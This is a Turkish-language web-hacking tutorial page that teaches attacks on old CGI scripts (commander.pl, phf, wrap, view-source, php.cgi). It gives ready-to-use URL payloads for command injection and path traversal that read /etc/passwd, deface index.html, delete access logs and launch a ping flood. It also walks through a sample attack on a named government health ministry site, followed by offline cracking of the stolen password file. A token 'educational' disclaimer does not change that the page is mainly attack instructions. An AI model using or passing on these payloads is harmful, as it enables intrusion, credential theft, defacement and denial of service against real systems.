WEB HACK İŞTE EN ÇOK MERAK ETTİĞİNİZ KONULARDAN BİRİ
Bölüm 1;
Herhangi Bir Subdomaine Linklenen Veya Tamamen
Subdomain Uzerine Kurulmuş Web Serverlarını
Commander.pl Açığı Ile Hackleyebiliriz
Ornek Subdomain Serverımız
|www.virtualave.net|
Adres http://heduhedu.virtualave.net Olsun
Komutlar
Ls: Dosya ve Klasörleri Gösterir: Ls /etc
Cat: Dosya Içeriğini Gösterir: Cat /etc/passwd
Pwd: Nerde Olduğumuzu Gösterir: Pwd
Rm: Dosya Silme Işlemi Için Kullanılır: Rm index.html
Mkdir: Yeni Klasör Açmaya Yarar: Mkdir webdagger
http://heduhedu.virtualave.net/commander.pl Pwd
Ile Nerde Olduğumuza Bakıyoruz
/www/home/usr/heduhedu/
Şimdi Istediğimiz Klasöre Geçip Içeriğine Bakabiliriz
Bölüm 2;
Commander.pl Açığı Ile Bir Başka Teknik Daha Var
Cgi-Bin Scannerları Kullanarak
www.hackedpage.com/cgi-bin/commander.pl
Diye Arayabiliriz
Bulma Şansımız Çok Yüksek Bulduğumuzu Farz Edelim
www.hackedpage.com/cgi-bin/commander.pl
Diye Giriyoruz Nerde Olduğumuzu Oğrenmek Için
www.hackedpage.com/cgi-bin/commander.pl Pwd
Yazıp Nerde Olduğumuza Bakıyoruz
/home/www/usr/hackedpage/cgi-bin/ Çıkıyor Karşımıza
Bu Sayfanın index ine HaCKeD By ?????
Yazmak Istiyoruz Mesela Echo Komutu
Bizim Ihtiyacımızı Görür
echo HaCKeD By ????? /home/www/usr/hackedpage/index.html
Yazıyoruz index.html De
HaCKeD ßy ????? Yazıyor..
Bölüm 3;
Hızli
bir hack yontemini anlatcam
Bu yontem cok hosunuza gidecek :) Gerekli Programlar : Internet Explorer
haricinde bir web browser, Cracker Jack ve tabiki bir Dict Maker.
-------------------------------------- Mantik : phf sistemlerde
bulunan bir acikdir ve bu acik sayesinde sisteme
web uzerinden baglanip shellde bazi komutlari calistirabilirsiniz...
Not : Calistirdiginiz komutlar cd, ls, cat gibi komutlar silme islemlerini
phf uzerinden yapamiyorsunuz...
-------------------------------------- Ozellikler : phf sayesinde
her hangi bir serverdan elinizde acc olmadan
passwd dosyasini alabilir ve kirabilirsiniz...Bu olay web uzerinden
olur ve hizli olur:))
-------------------------------------- Kullanim : phf nin
kullanimi basitdir, sizi fazla zorlamaz. browsera girdiginiz adresin sonu
asagidaki
satiri yazarsaniz "passwd" dosyasini browser penceresinde gorursunuz...
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Bu satirin mantigi sudur...
Asagidaki satir phf olayini acar.../cgi-bin/phf?Qalias=x%0a
Bu satirdan sonra yazacaginiz komutlarsistem uzerinde calistirilir...
ornegin :
cat%20/etc/passwd
etc dizinin altindaki passwd dosyasini goruntuler burda %20 bosluk oldugunu
belirtir yani :/cgi-bin/phf?Qalias=x%0als yazarsaniz bulundugunuz dizindeki
dosyalar
goruntulenir.../cgi-bin/phf?Qalias=x%0als%20pass*
yazarsaniz bulundugunuz dizinde pass ile baslayan butun dosyalari
listeler...
Komutun Kullanimi Kolay!
Simdi Biraz Ornek Cozelim!
-------------------------------------- Evet bu ornek kesinlikle
ogretim amacli cozulmusdur herhangi bir art niyetim
yok:))
Hedef : T.C. Saglik Bakanligi
Gerekli Bilgiler : Sadece web sayfalarinin
adresi : www.saglik.gov.tr
Browser inizi calistirin...
Adres olarak www.saglik.gov.tr yazin.Evet sayfa geldi simdi bakalim phf
acigi var mi ?
http://www.saglik.gov.tr/cgi-bin/phf?Qalias=x%0als
yazin!
tamam dosya listesi karsimiza geldigine gore phf olayi isliyor...
Simdi passwd dosyasini alalim...cat /etc/passwd komutu ile...
bu nu phf ile asagidaki gibi yaziliyor...
http://www.saglik.gov.tr/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
tamam Ok dir password dosyasini gordunuz! bunu simdi cut/copy/paste ile bir
dosyaya saklayin...Internet baglantisini kesin ve dos moduna
gecin... Sakladiginiz dosyayi Cracker Jack adli programin bulundugu dizine
kopyalayin.
Eger daha onceden hazirladiginiz bir wordlist varsa Cracker Jack ile "passwd"
dosyasini kirmaya baslayin yoksa once Dict Maker v1.0 ile
bir wordlist hazirlayin... Cracker Jack passwd dosyasindaki acclari kirmaya
baslar... Bu islem
gunlerce surer ve kirdigi acclari kullanabilirsiniz...
Bölüm 4;
scriptler...
a- (Phf scripti):
Pek cok web ana bilgisayari CGI-BIN guvenli?inden
yoksundur.
Bir de bunun uzerine sistem yöneticilerinin CGI-BIN guvenlik
aciklarini
bilmemesi potansiyel sistem aciklarina yol acmaktadir. Tum
dunyada pek
cok hacker'in kullandi?i cgi-bin guvenlik aci?i:
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0acat%20/etc/passwd
Fakat bazi
uyanik sistem yöneticileri phf komutunun kullanimini
sinirlamislardir. Bu yuzden bu komutu calistiramayabilirsiniz. Fakat yine
de alternatif web
makinalari uzerinde denemekte yarar var.
b- (Wrap Scripti):
Irix isletim sisteminin 6.2 versiyonunda rastlanan bu
hatayi da
söyle istismar edebiliriz:
http://www.kiraca?imizadres.com.tr/cgi-bin/wrap?../../../etc/passwd
http://www.kiraca?imizadres.com.tr/cgi-bin/wrap?%0als
(...)
Dikkat edece?imiz
tek nokta bu hata sadece IRIX 6.2'de var. !!
c- (View
Source Scripti): Denemek serbest (basariya ulasabilme
ihtimali kadar
ulasamama ihtimali de var)
http://www.kiraca?imizadres.com.tr/cgi-bin/view-source?../../../etc/passwd
ya da
http://www.kiraca?imizadres.com.tr/cgi-bin/view-source?%1b or
%0a %20
d- (php.cgi
Scripti):
http://www.victim.com/cgi-bin/php.cgi?../../../etc/passwd
e- Di?er
Denenebilir Scriptler:
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s
%205000%20ip%20to%20shoot
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20fhp
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20.blah
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0amkdir%20/www/dirtocreate
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0arm%20../logs/access_log
Giriş | Program&Driver | Web Hack Bilgi | Fotoğraf Albümü | WebMaster3